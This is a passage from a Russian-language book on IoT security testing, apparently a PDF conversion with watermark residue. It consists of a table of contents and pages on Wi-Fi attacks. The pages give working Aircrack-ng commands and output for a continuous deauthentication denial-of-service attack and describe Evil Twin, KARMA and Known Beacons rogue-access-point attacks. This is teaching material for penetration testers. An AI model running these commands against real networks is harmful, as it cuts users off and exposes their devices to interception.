- •От издательства
- •О техническом обозревателе
- •О соавторах
- •Об авторах
- •Вступительное слово
- •Благодарности
- •Предисловие
- •Почему важна защита интернета вещей?
- •Чем защита интернета вещей отличается от традиционной ИТ-защиты?
- •Законы хакинга интернета вещей
- •Заключение
- •Моделирование угроз для интернета вещей
- •Схема моделирования угроз
- •Определение архитектуры
- •Разбивка архитектуры на компоненты
- •Выявление угроз
- •Использование деревьев атак для обнаружения угроз
- •Распространенные угрозы интернета вещей
- •Атаки с подавлением сигнала
- •Атаки с воспроизведением
- •Атаки со взломом настроек
- •Клонирование узла
- •Заключение
- •Пассивная разведка
- •Физический или аппаратный уровень
- •Периферийные интерфейсы
- •Среда загрузки
- •Блокировки
- •Предотвращение и обнаружение несанкционированного доступа
- •Прошивка
- •Интерфейсы отладки
- •Физическая устойчивость
- •Разведка
- •Атаки на сетевой протокол и службы
- •Тестирование беспроводного протокола
- •Оценка веб-приложений
- •Картирование приложений
- •Элементы управления на стороне клиента
- •Аутентификация
- •Управление сеансом
- •Проверка ввода
- •Логические ошибки
- •Сервер приложений
- •Исследование конфигурации хоста
- •Учетные записи пользователей
- •Привилегии учетной записи
- •Уровни патчей
- •Удаленное обслуживание
- •Управление доступом к файловой системе
- •Шифрование данных
- •Неверная конфигурация сервера
- •Мобильное приложение и облачное тестирование
- •Заключение
- •4. Оценка сети
- •Переход в сеть IoT
- •VLAN и сетевые коммутаторы
- •Спуфинг коммутатора
- •Двойное тегирование
- •Имитация устройств VoIP
- •Идентификация устройств IoT в сети
- •Обнаружение паролей службами снятия отпечатков
- •Атаки MQTT
- •Настройка тестовой среды
- •Написание модуля MQTT Authentication-Cracking в Ncrack
- •Тестирование модуля Ncrack на соответствие MQTT
- •Заключение
- •5. Анализ сетевых протоколов
- •Проверка сетевых протоколов
- •Сбор информации
- •Анализ
- •Создание прототипов и разработка инструментов
- •Работа с Lua
- •Общие сведения о протоколе DICOM
- •Генерация трафика DICOM
- •Включение Lua в Wireshark
- •Определение диссектора
- •Определение основной функции диссектора
- •Завершение диссектора
- •Создание диссектора C-ECHO
- •Начальная загрузка данных функции диссектора
- •Анализ полей переменной длины
- •Тестирование диссектора
- •Разработка сканера служб DICOM для механизма сценариев Nmap
- •Написание библиотеки сценариев Nmap для DICOM
- •Коды и константы DICOM
- •Написание функций создания и уничтожения сокетов
- •Создание заголовков пакетов DICOM
- •Написание запросов контекстов сообщений A-ASSOCIATE
- •Чтение аргументов скрипта в движке сценариев Nmap
- •Определение структуры запроса A-ASSOCIATE
- •Анализ ответов A-ASSOCIATE
- •Создание окончательного сценария
- •Заключение
- •6. Использование сети с нулевой конфигурацией
- •Использование UPnP
- •Стек UPnP
- •Распространенные уязвимости UPnP
- •Злоупотребление UPnP через интерфейсы WAN
- •Другие атаки UPnP
- •Использование mDNS и DNS-SD
- •Как работает mDNS
- •Как работает DNS-SD
- •Проведение разведки с помощью mDNS и DNS-SD
- •Злоупотребление на этапе проверки mDNS
- •Атаки «человек посередине» на mDNS и DNS-SD
- •Использование WS-Discovery
- •Как работает WS-Discovery
- •Подделка камер в вашей сети
- •Создание атак WS-Discovery
- •Заключение
- •UART
- •Аппаратные средства для связи с UART
- •Как найти порты UART
- •Определение скорости передачи UART
- •JTAG и SWD
- •JTAG
- •Как работает SWD
- •Аппаратные средства для взаимодействия с JTAG и SWD
- •Идентификация контактов JTAG
- •Взлом устройства с помощью UART и SWD
- •Целевое устройство STM32F103C8T6 (Black Pill)
- •Настройка среды отладки
- •Кодирование целевой программы на Arduino
- •Отладка целевого устройства
- •Заключение
- •Как работает SPI
- •Как работает I2C
- •Настройка архитектуры шины I2C типа «контроллер–периферия»
- •Заключение
- •9. Взлом прошивки
- •Прошивка и операционные системы
- •Получение доступа к микропрограмме
- •Взлом маршрутизатора Wi-Fi
- •Извлечение файловой системы
- •Статический анализ содержимого файловой системы
- •Эмуляция прошивки
- •Динамический анализ
- •Внедрение бэкдора в прошивку
- •Нацеливание на механизмы обновления микропрограмм
- •Компиляция и установка
- •Код клиента
- •Запуск службы обновления
- •Уязвимости служб обновления микропрограмм
- •Заключение
- •10. Радио ближнего действия: взлом rFID
- •Радиочастотные диапазоны
- •Пассивные и активные технологии RFID
- •Структура меток RFID
- •Низкочастотные метки RFID
- •Высокочастотные RFID-метки
- •Настройка Proxmark3
- •Обновление Proxmark3
- •Клонирование низкочастотных меток
- •Клонирование высокочастотных меток
- •Имитация RFID-метки
- •Изменение содержимого RFID-меток
- •Команды RAW для небрендированных или некоммерческих RFID-тегов
- •Подслушивание обмена данными между меткой и считывателем
- •Извлечение ключа сектора из перехваченного трафика
- •Атака путем подделки RFID
- •Автоматизация RFID-атак с помощью механизма скриптов Proxmark3
- •Пользовательские сценарии использования RFID-фаззинга
- •Заключение
- •11. Bluetooth Low Energy (BLE)
- •Как работает BLE
- •Необходимое оборудование BLE
- •BlueZ
- •Настройка интерфейсов BLE
- •Обнаружение устройств и перечисление характеристик
- •GATTTool
- •Bettercap
- •Взлом BLE
- •Настройка BLE CTF Infinity
- •Приступаем к работе
- •Заключение
- •12. Радиоканалы средней дальности: взлом Wi-Fi
- •Как работает Wi-Fi
- •Атаки Wi-Fi на беспроводные клиенты
- •Деаутентификация и атаки «отказ в обслуживании»
- •Атаки на Wi-Fi путем подключения
- •Wi-Fi Direct
- •Атаки на точки доступа Wi-Fi
- •Взлом WPA/WPA2
- •Взлом WPA/WPA2 Enterprise для сбора учетных данных
- •Методология тестирования
- •Заключение
- •13. Радио дальнего действия: LPWAN
- •Захват трафика LoRa
- •Настройка платы разработки Heltec LoRa 32
- •Настройка LoStik
- •Превращаем USB-устройство CatWAN в сниффер LoRa
- •Декодирование протокола LoRaWAN
- •Формат пакета LoRaWAN
- •Присоединение к сетям LoRaWAN
- •Атаки на LoRaWAN
- •Атаки с заменой битов
- •Генерация ключей и управление ими
- •Атаки воспроизведения
- •Подслушивание
- •Подмена ACK
- •Атаки, специфичные для приложений
- •Заключение
- •14. Взлом мобильных приложений
- •Разбивка архитектуры на компоненты
- •Выявление угроз
- •Защита данных и зашифрованная файловая система
- •Подписи приложений
- •Аутентификация пользователя
- •Управление изолированными аппаратными компонентами и ключами
- •Проверенная и безопасная загрузка
- •Анализ приложений iOS
- •Подготовка среды тестирования
- •Статический анализ
- •Динамический анализ
- •Атаки путем инъекции
- •Хранилище связки ключей
- •Реверс-инжиниринг двоичного кода
- •Перехват и изучение сетевого трафика
- •Анализ приложений Android
- •Подготовка тестовой среды
- •Извлечение файла APK
- •Статический анализ
- •Обратная конвертация двоичных исполняемых файлов
- •Динамический анализ
- •Перехват и анализ сетевого трафика
- •Утечки по побочным каналам
- •Заключение
- •15. Взлом умного дома
- •Физический доступ в здание
- •Клонирование RFID-метки умного дверного замка
- •Глушение беспроводной сигнализации
- •Воспроизведение потока с IP-камеры
- •Общие сведения о протоколах потоковой передачи
- •Анализ сетевого трафика IP-камеры
- •Извлечение видеопотока
- •Атака на умную беговую дорожку
- •Перехват управления интеллектуальной беговой дорожкой на базе Android
- •Заключение
- •Инструменты для взлома интернета вещей
- •Предметный указатель
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
|
X |
|
|
|
|
|
|||
|
|
|
- |
|
|
|
|
|
d |
|
||
|
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|||
|
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
BUY |
|
|
|||
тативную точку доступа TP-Link, но подойдет любая. Если атаки не |
|
|
|
to |
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
m |
|||
|
w Click |
|
|
|
|
|
|
|||||
|
w |
|
|
|
|
|
|
|
|
|
|
|
являются частью деятельности «красной команды» |
|
w |
|
df-x chan |
|
o |
|
|||||
, мощность пе- |
. |
.c |
|
|||||||||
1 |
|
|
|
|
|
|
|
|
||||
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
e |
|
редачи точки доступа или тип антенны, которую вы используете, не играют особой роли.
Атаки Wi-Fi на беспроводные клиенты
Атаки на беспроводные клиенты обычно используют тот факт, что фреймы управления 802.11 не защищены криптографически, остав- ляя пакеты подверженными перехвату, модификации или воспроиз- ведению. Вы можете выполнить все эти атаки с помощью ассоциа- тивных атак по принципу «человек посередине». Злоумышленики также могут выполнять атаки деаутентификации и отказа в обслу- живании, которые нарушают подключение жертвы по Wi-Fi к своей точке доступа.
Деаутентификация и атаки «отказ в обслуживании»
Фреймы управления в 802.11 не могут помешать злоумышленнику подделать MAC-адрес устройства. В результате злоумышленник мо- жет подделать фреймы Deauthenticate или Disassociate. Это фреймы управления, которые обычно отправляются для прекращения под- ключенияклиентакточкедоступа.Например,ониотправляются,если клиентподключается кдругойточкедоступа или просто отключается от исходной сети. При взломе злоумышленник может использовать эти фреймы, чтобы разорвать существующие соединения с конкрет- ными клиентами.
В качестве альтернативы, вместо того чтобы отключать клиента от AP, злоумышленник может засыпать AP запросами аутентификации. Они в свою очередь вызывают отказ в обслуживании,не позволяя за- конным клиентам подключаться кточке доступа.Обе атаки являются известными атакамитипа «отказ в обслуживании»,которые частично устранены в стандарте 802.11w, однако он еще не получил широкого распространения в мире интернета вещей.В этом разделе мы выпол- ним атаку деаутентификации, которая отключает всех беспроводных клиентов отточки доступа.
НачнитесустановкипакетаAircrack-ng,есливынеиспользуетеKali, где он предустановлен. Aircrack-ng содержит инструменты оценки Wi-Fi. Убедитесь, что ваша сетевая карта с возможностью внедрения пакетов подключена к компьютеру. Затем используйте утилиту iwconfig для определения имени интерфейса,принадлежащего беспро- водной карте, подключенной к вашей системе:
1Команда экспертов по безопасности , имитирующих действия злоумыш- ленников. Обычно им противостоит «синяя команда» службы безопас ности предприятия.– Прим.ред.
334 Глава 12
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
#apt-get install aircrack-ng
#iwconfig
docker0 |
no wireless extensions. |
|
|
lo |
no wireless extensions. |
|
|
wlan0 |
IEEE 802.11 |
ESSID:off/any |
|
|
Mode:Managed |
Access Point: Not-Associated |
Tx-Power=20 dBm |
|
Retry short |
long limit:2 RTS thr:off |
Fragment thr:off |
|
Encryption key:off |
|
|
|
Power Management:off |
|
|
eth0 |
no wireless extensions. |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Ввыходномсообщенииутилитыуказано,чтобеспроводнойинтер-
фейс – wlan0 .
Поскольку некоторые процессы в системе могут мешать работе инструментов из набора Aircrack-ng, используйте инструмент Air- mon-ng для обнаружения и автоматической остановки этих про- цессов. Для этого сначала отключите беспроводной интерфейс с по мощью ifconfig:
#ifconfig wlan0 down
#airmon-ng check kill
Killing these processes: PID Name
731 dhclient
1357 wpa_supplicant
Теперьпереведитебеспроводнуюкартуврежиммониторингаспо мощью Airmon-ng:
# airmon-ng start wlan0 |
|
||
PHY |
Interface |
Driver |
Chipset |
phy0 |
wlan0 |
ath9k_htc |
Qualcomm Atheros Communications AR9271 802.11n |
|
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) |
||
|
(mac80211 station mode vif disabled for [phy0]wlan0) |
||
|
|
|
|
Этот инструмент создает новый интерфейс с именем wlan0mon, ко- торыйвыможетеиспользоватьдлязапускабазовогосеансасниффин- га с помощью Airodump-ng. Следующая команда определяет BSSID точки доступа (ее MAC-адрес) и канал, на котором она работает:
# airodump-ng wlan0mon |
|
|
|
|
|
|
|
|
|
CH 11 ][ Elapsed: 36 s ][ 2019-09-19 10:47 |
|
|
|
|
|
|
|||
BSSID |
PWR |
Beacons |
#Data, #/s |
CH |
MB |
ENC CIPHER AUTH ESSID |
|||
6F:20:92:11:06:10 |
-77 |
15 |
0 |
0 |
6 |
130 |
WPA2 CCMP |
PSK |
ZktT 2.4Ghz |
6B:20:9F:10:15:6E |
-85 |
14 |
0 |
0 |
11 |
130 |
WPA2 CCMP |
PSK |
73ad 2.4Ghz |
7C:31:53:D0:A7:CF |
-86 |
13 |
0 |
0 |
11 |
130 |
WPA2 CCMP |
PSK |
A7CF 2.4Ghz |
82:16:F9:6E:FB:56 |
-40 |
11 |
39 |
0 |
6 |
65 |
WPA2 CCMP |
PSK |
Secure Home |
E5:51:61:A1:2F:78 |
-90 |
7 |
0 |
0 |
1 |
130 |
WPA2 CCMP |
PSK |
EE-cwwnsa |
|
|
|
|
|
|
|
|
|
|
Радиоканалы средней дальности: взлом Wi-Fi 335
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|||
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
В этом примере BSSID – 82: 16: F9: 6E: FB: 56, канал – 6. Мы пере- |
|
|
|
to |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
m |
||
w Click |
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
df-x chan |
|
o |
|
|||||
даем эти данные в Airodump-ng для идентификации клиентов, под- |
. |
.c |
|
||||||||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
e |
|
ключенных к AP:
# airodump-ng wlan0mon --bssid 82:16:F9:6E:FB:56 |
|
|
|
|
|
|
||||
CH 6 |[ Elapsed: 42 s ] [ 2019-09-19 10:49 |
|
|
|
|
|
|
|
|||
BSSID |
PWR Beacons |
#Data, #/s |
CH |
MB |
ENC |
CIPHER |
AUTH |
ESSID |
||
82:16:F9:6E:FB:56 |
-37 |
24 |
267 |
2 |
6 |
65 |
WPA2 CCMP |
PSK |
Secure Home |
|
BSSID |
STATION |
|
PWR |
|
Rate |
Lost |
Frames |
Probe |
||
82:16:F9:6E:FB:56 |
50:82:D5:DE:6F:45 -28 |
|
0e0e |
|
904 |
274 |
|
|
||
|
|
|
|
|
|
|
|
|
|
|
Наосновеэтихвыходныхданныхмыидентифицируемодногокли- ента, подключенного к точке доступа. Клиенту принадлежит BSSID 50: 82: D5: DE: 6F: 45 (MAC-адрес его беспроводного сетевого интер- фейса).
Теперь вы можете отправить клиенту много разъединяющих па- кетов, чтобы заставить его потерять подключение к интернету. Для проведения атаки используем Aireplay-ng:
# aireplay-ng --deauth 0 -c 50:82:D5:DE:6F:45 -a 82:16:F9:6E:FB:56 wlan0mon
Параметр --deauth указывает атаку разъединения и количество пакетов разъединения,которые будут отправлены.Выбор 0 означает, что пакеты будут отправляться непрерывно. Параметр -a указывает BSSID точки доступа, а параметр -c – целевые устройства. В следую- щем листинге представлен выход вышеупомянутой команды:
11:03:55 |
Waiting for beacon frame (BSSID: 82:16:F9:6E:FB:56) on channel |
6 |
|
11:03:56 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[ 0|64 ACKS] |
||
11:03:56 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[66|118 ACKS] |
||
11:03:57 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[62|121 ACKS] |
||
11:03:58 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[64|124 ACKS] |
||
11:03:58 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[62|110 ACKS] |
||
11:03:59 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[64|75 ACKS] |
||
11:03:59 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[63|64 ACKS] |
||
11:03:00 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[21|61 ACKS] |
||
11:03:00 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[ 0|67 ACKS] |
||
11:03:01 |
Sending 64 |
directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[ 0|64 ACKS] |
11:03:02 |
Sending 64 |
directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[ 0|61 ACKS] |
11:03:02 |
Sending 64 |
directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[ 0|66 ACKS] |
11:03:03 |
Sending 64 |
directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] |
[ 0|65 ACKS] |
|
|
|
|
Здесь показаны разъединяющие пакеты, отправленные цели. Ата- кауспешна,когдацелевоеустройствостановитсянедоступным.Когда вы проверите это устройство,вы увидите,что оно больше не подклю- чено ни к одной сети.
Вы также можете выполнять атаки типа «отказ в обслуживании» против Wi-Fi другими способами. Радиопомехи, еще один распро-
336 Глава 12
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
страненный метод, мешают беспроводной связи независимоw |
|
|
to |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|||
от |
|
|
|
|
|
m |
||||
w Click |
|
|
|
|
|
o |
||||
|
w |
|
|
|
|
|
|
|
|
|
беспроводного протокола. В этой атаке злоумышленник используетdf-x chan |
.c |
|
||||||||
|
. |
|
|
|
|
|
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
e |
|
программно определяемое радиоустройство или дешевые стандарт- ные ключи Wi-Fi, чтобы передавать радиосигналы и сделать беспро- водной канал непригодным для использования другими устройства- ми. Мы покажем такую атаку в главе 15.
Вкачествеальтернативывыможетевыполнитьвыборочнуюпоста- новку помех, сложную версию атаки радиоподавления, при которой злоумышленник перехватываеттолько определенные пакеты, имею- щие значение для поддержания действующего соединения.
Стоит отметить, что для некоторых наборов микросхем атаки деа- утентификации могут также понижать уровень ключей шифрования, используемых для связи междуточкой доступа и клиентом.Недавнее исследование антивирусной компании ESET выявило эту уязвимость, получившую название Kr00k (CVE-2019-15126). Подвергшиеся атаке чипы Wi-Fi используют нулевой ключ шифрования при повторном подключении, что позволяет злоумышленникам расшифровывать пакеты, переданные уязвимым устройством.
Атаки на Wi-Fi путем подключения
Атака путем подключения обманом заставляет беспроводную стан- цию подключиться к контролируемой злоумышленником точке до- ступа. Если целевая станция уже подключена к какой-либо другой сети,злоумышленникобычноначинаетсреализацииодногоизмето- довдеаутентификации,которыемытолькочтообъяснили.Кактолько целевое устройствопотерялосоединение слегальнойточкойдоступа, злоумышленник может заманить ее в мошенническую сеть, злоупо- требляя различными функциями своего сетевого менеджера.
В этом разделе мы кратко описываем наиболее популярные ата- ки путем подключения, а затем демонстрируем атаку под названием
Known Beacons.
Атака «злого двойника»
Самая распространенная ассоциативная атака – это «злой двойник» (Evil Twin), когда клиента обманом заставляют подключиться к под- дельной точке доступа, убедив его, что он подключается к известной и законной точке.
Мы можем создать поддельную точку доступа, используя сетевой адаптер с функциями мониторинга и ввода пакетов. С помощью этой сетевой карты мы настроили точку доступа и настроили ее ка- нал, ESSID и BSSID, не забыв скопировать ESSID и тип шифрования законной точки доступа. Теперь мы отправим целевому устройству более сильный сигнал, чем сигнал подлинной точки доступа. Вы мо- жетеулучшитьсвойсигналспомощью различныхметодов,например расположившись ближе к цели, чем действующая точка доступа, или используя более эффективную антенну.
Радиоканалы средней дальности: взлом Wi-Fi 337
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
|
X |
|
|
|
|
|
|||
|
|
|
- |
|
|
|
|
|
d |
|
||
|
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|||
|
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
BUY |
|
|
|||
Атака типа KARMA |
|
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||||
|
|
|
|
|
|
|||||||
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
|
p |
|
|
|
|
g |
|
|
|
KARMA-атаки подключают пользователей к незащищенным сетям, |
|
|
df |
|
|
n |
e |
|
||||
|
|
|
|
|
|
-x cha |
|
|
|
|
используя уязвимость клиентов, настроенных на автоматическое об- наружение знакомых беспроводных сетей. При такой настройке кли- ентвыдаетпрямойпробныйзапрос,запрашиваяопределенныеточки доступа, а затем подключается к найденной точке без аутентифика- ции. Пробный запрос – это фрейм управления, который инициирует процесс связывания. Учитывая эту конфигурацию, злоумышленник может просто подтвердить любой из клиентских запросов и подклю- чить его к своей нелегальной точке доступа.
Чтобы KARMA-атака сработала, устройства, которые вы атакуете, должны соответствовать трем требованиям. Целевая сеть должна иметьтип Open (открытая), у клиента должен быть включен флагAu- toConnect, и клиент должен транслировать свой список предпочти-
тельных сетей. Список предпочтительных сетей – это список сетей,
к которым клиент ранее подключался и которым теперь доверяет. Клиент с включенным флагом AutoConnect будет подключаться к AP автоматически, если AP отправляет ему ESSID, уже указанный в спи- ске предпочтительных сетей клиента.
Самые современные операционные системы не уязвимы для атак KARMA, потому что они не отправляют свои списки предпочтитель- ных сетей, но иногда вы можете столкнуться с уязвимой системой в старых устройствах интернета вещей или принтерах. Если устрой- ствокогда-либоподключалоськоткрытойсети,скрывающейсвойES- SID, оно определенно уязвимо для атаки KARMA. Причина в том, что единственныйспособподключитьсякоткрытымсетям,скрывающим свой ESSID, –отправитьим прямой запрос,и в этом случае создаются все условия, необходимые для атак KARMA.
Атака типа Known Beacons
После разоблачения атаки KARMA большинство операционных си- стем прекратило прямое зондирование точек доступа; вместо этого они используют только пассивное наблюдение, при котором устрой- ство прослушиваетизвестный ESSID из сети.Этоттип поведения пол- ностью исключает все случаи атак KARMA.
Атакатипа Known Beacons (известные маяки) обходитэту функцию безопасности ,используятотфакт,чтомногиеоперационныесистемы по умолчанию включают флаг AutoConnect. Поскольку AP часто име- ют очень распространенные имена, злоумышленник может угадать ESSID открытой сети в списке предпочтительных сетей устройства. Затем он обманом заставляет это устройство автоматически подклю- чаться к точке доступа, контролируемой злоумышленником.
В более сложной версии атаки злоумышленник может использо- вать словарь распространенных ESSID, например Guest («гость»), FREE Wi-Fi («бесплатный Wi-Fi») и т. д., к которым жертва, вероятно, подключаласьв прошлом.Это оченьпохоже на попытку получитьне- санкционированныйдоступкучетнойзаписислужбыпутемпростого
338 Глава 12
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
перебора имени пользователя, когда пароль не требуется: довольно |
|
|
|
|
|
m |
|||||
|
w Click |
|
|
|
|
|
|
||||
|
w |
|
|
|
|
|
|
|
|
|
|
простая, но эффективная атака. |
|
w |
|
df-x chan |
|
o |
|
||||
|
. |
.c |
|
||||||||
|
|
